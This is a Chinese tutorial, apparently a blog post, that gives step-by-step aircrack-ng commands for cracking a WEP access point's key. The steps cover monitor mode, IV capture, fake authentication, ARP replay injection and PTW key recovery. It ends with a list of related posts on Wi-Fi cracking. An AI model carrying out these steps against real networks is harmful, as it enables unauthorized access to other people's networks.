无线安全WLAN WEP破解(一)
WEP加密破解
一. 接入无线网卡
点击可移动设备,选择连接我们的无线网卡设备。
二、开启无线网卡,在特定的AP频道开启监控模式
是将网卡开启成monitor模式. monitor模式可以使网卡监听任何一个数据包. 正常情况下, 我们只能接收到发送给我们的数据包, 但是通过monitor模式, 我们就可以从所有的数据包中选择一些用来后续的注入.
输入ifconfig,查看自己的网卡接口,一般是wlan0
输入命令 airmon-ng start wlan0
有进程影响网卡启动输入airmon-ng check kill 杀死进程
重新开启网卡,显示有monitor模式
三、使用airodump-ng wlan0
查看有哪些采用wep加密的AP在线,然后按 ctrl+c 可以退出。注意,wep加密的才行,同时还能看到bssid(网卡地址)和ch(频道)
airodump-ng wlan0
四、使用airodump-ng收集IVs
这一步的目的是捕捉产生的IVs, 打开另一个控制台,
输入:airodump-ng -c 3 --bssid 00:26:5A:C5:EB:A8 -w wep wlan0
其中:
• -c是无线网络的频道(第三步标注出来的哪一行的ch信道数字为3)
• –bssid 00:26:5A:C5:EB:A8是无线接入点的MAC地址.(第三步里面的bssid与这里相同)
• -w后跟文件名的前缀, 该文件会包含IVs
• wlan0是接口名称
五、使用aireplay-ng伪装同接入点建立联系
这里需要无线网卡mac地址,重新打开一个控制台输入
ip link show
为了使接入点能接收到数据包, 源MAC地址必须和接入点先建立联系. 如果你进行注入时使用的MAC地址没有和接入点建立联系, 那么新的IVs就不能产生, 因为接入点会忽略所有注入的数据包. 这是注入失败最大可能的原因. 要建立联系要么通过已经有联系的客户端, 要么使用伪装的认证.通过伪装建立联系, 输入:
aireplay-ng -1 0 -e Dlink -a 00:26:5A:C5:EB:A8 -h 00:e1:00:87:14:06 wlan0
其中:
• -1表示伪装
• 0以秒计时
• -e Dlink是无线网络名称
• -a 00:26:5A:C5:EB:A8 是接入点的MAC地址
• -h 00:e1:00:87:14:06 是网卡的MAC地址
• wlan0 是无线接口名称
输入之后出现红框中的语句才算成功
六、测试网卡的注入能力
这一步的目的是确保无线网卡在接入点的范围内, 以便可以进行数据包的注入. 输入命令:
aireplay-ng -9 wlan0
其中
• -9表示注入测试
• wlan0是无线接口的名称七、使用aireplay-ng的ARP模式注入数据包
这一步的目的是使用aireplay-ng监听ARP请求然后再将数据包注入到网络. 选择ARP请求是因为接入点会广播它们并产生新的IV. 所以, 着就达到了我们需要段时间内获得大量IVs的目的.
打开另一个控制台输入命令:
aireplay-ng -3 -b 00:26:5A:C5:EB:A8 -h 00:e1:00:87:14:06 wlan0
• -3 ARP-request 注入攻击模式
• -b 00:26:5A:C5:EB:A8 是接入点的MAC地址
• -h 00:e1:00:87:14:06 是网卡的MAC地址
注意读取和发送的数据包都要有,否则就是步骤过程有问题。
八、用aircrack-ng破解IVs获得密码
这一步的目的是根据前面获得的IVs破解除出密码…打开另一个会话窗口,输入命令:
aircrack-ng -z wep.cap
因为RC4流密码利用IVs获得密码的时候,都是以两位两位的方式进行破解校对的,所以最后显示出来的密码是以两位两位展示,中间用冒号隔开。
结果如下图
其中:
• -z 调用 PTW WEP 破解方法
• awep.cap 表示以wep为前缀,以cap为后缀的文件(第四步里执行命令的时候告诉了保存文件的名字)
无线安全WLAN WEP破解(一)相关推荐
- 【转】使用bt4(Backtrack)破解无线路由(无线网络/无线AP)密码/wep加密/Aircrack-ng
前言 本教程,目的是让大家可以了解破解无线网络的方式,提高安全意识,加强网络安全.请不要用于非法目的. 另外,在互联网上,有太多的方法知道你是谁,不要以为用别人的AP就没法找得到你. 软件安装 使用b ...
- 无线WiFi安全渗透与攻防(六)之WEP破解-Gerix-wifi-cracker自动化破解WEP加密
系列文章 无线WiFi安全渗透与攻防(一)之无线安全环境搭建 无线WiFi安全渗透与攻防(二)之打造专属字典 无线WiFi安全渗透与攻防(三)之Windows扫描wifi和破解WiFi密码 无线WiF ...
- 无线攻击及密码破解的四种方式详解
随着社会的进步,现在我们在每一地方逗留都离不开无线通信,WiFi.4G等等:这就是无线领域的优势所在! 无线领域十分难以捉摸,从一点儿一点儿进步到现在,无线的安全深入人心,站在安全的角度来说无线通信一 ...
- 一个无线遥控通讯协议破解实例
2.4G无线遥控通讯协议破解-美嘉欣 准备做平衡车,缺个遥控器,又不想用手机App.刚好手中有个之前买的遥控直升机,配套的2.4G遥控器看着还行,就打算拿来用在平衡车上.于是就开始了破解 ...
- 上海贝尔无线猫破解 电信“我的e家”无线猫路由上网破解全教程
上海贝尔无线猫破解[置顶]电信"我的e家"无线猫路由上网破解全教程 中国电信出了一个"我的E家"上网套餐,实际上这个无线猫功能并不完整,至少ADSL Modem ...
- [转]如何使用BackTrack破解WIFI无线网络的WEP密钥
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface) 你可能已经知道如果你想要加锁自己的WIFI无线网络,你最 ...
- 如何使用BackTrack破解WIFI无线网络的WEP密钥
你可能已经知道如果你想要加锁自己的WIFI无线网络,你最好选择WPA加密方式,因为WEP加密很容易被人破解.但是,你知道有多么的容易么?下面我们来看看吧. 注意:此帖是验证如何破解很少使用而陈旧的WE ...
- 无线攻击之Aircrack-ng破解无线密码(无线密码破解套件)
文章目录 E1.阐述 E2.套件一览表 E3.命令一览表 一.环境介绍 二.操作步骤 2.1 网卡配置 2.2 命令步骤 三.命令快览 未经允许破解别人密码是违法行为,本文章仅供学习!(如果你想直接看 ...
- wlan服务器文件路径,用于无线局域网 (WLAN) 的 Netsh 命令
此部分包含以下 Netsh WLAN 命令: add filter 按服务集标识符 (SSID) 向无线允许或阻止列表中添加无线网络. 语法 add filter permission={allow| ...
- 无线wifi密码的破解
闲着无聊,就将以前所整理的关于无线wifi的破解方式分享给大家.纯属技术探讨,请勿作恶! 工具: 带无线网卡的电脑一台 2G以上U盘一个 搜索下载BT3,约900多兆 搜索下载spoonwep2中文包 ...
最新文章
- C++ 虚函数个人理解
- 判断二叉树中两个节点的最低共同父节点
- 如何在不停止程序的情况下打印完整的回溯?
- python 中的转义序列
- 域控制器显示无法使用解决办法
- Go Time常用语法
- linux war版本管理,linux(centos8):用systemctl管理war包形式的jenkins(java 14 / jenkins 2.257)...
- 【BZOJ】1013 球形空间产生器
- “harmony”整合不同平台的单细胞数据之旅
- 前端开发利器 - WebStorm
- 自动超频_超频的几种方式
- linux 查看登录记录,Linux查看用户登陆历史记录
- c语言graphics下载,C语言_graphics.h
- linux 运行有道词典,Ubuntu中使用有道词典
- input框隐藏和不可编辑
- 第九节 初始模块结构图的设计
- 符冉迪 计算机 培训,采用多模糊支持向量机决策融合的积雨云检测.pdf
- linux ipp,Get Started with Intel® Integrated Performance Primitives
- 如何把团队带成一盘散沙?
- kali-linux-2018.2-i386.iso
热门文章
- SpringBoot使用之yaml配置注入(推荐使用)
- 苹果youtube无法连接网络_当手机无信号或者无法连接网络时的正确解决步骤
- 简单粗暴搞定网易云音乐限制!找回失去的灰色快乐
- ps -ef|grep详解
- 孙悟空的师傅的真实身份
- [iOS]日历和提醒编程指南(Calendar and Reminders Programming Guide)
- ept技术_[讨论]R3检测EPT方式HOOK页面的方案(20170919更新-已解决)
- C语言 判断一个数是否为水仙花数
- 大学生面试20个经典问题及回答思路
- 【CVPR 2021】Refine Myself by Teaching Myself : Feature Refinement via Self-Knowledge Distillation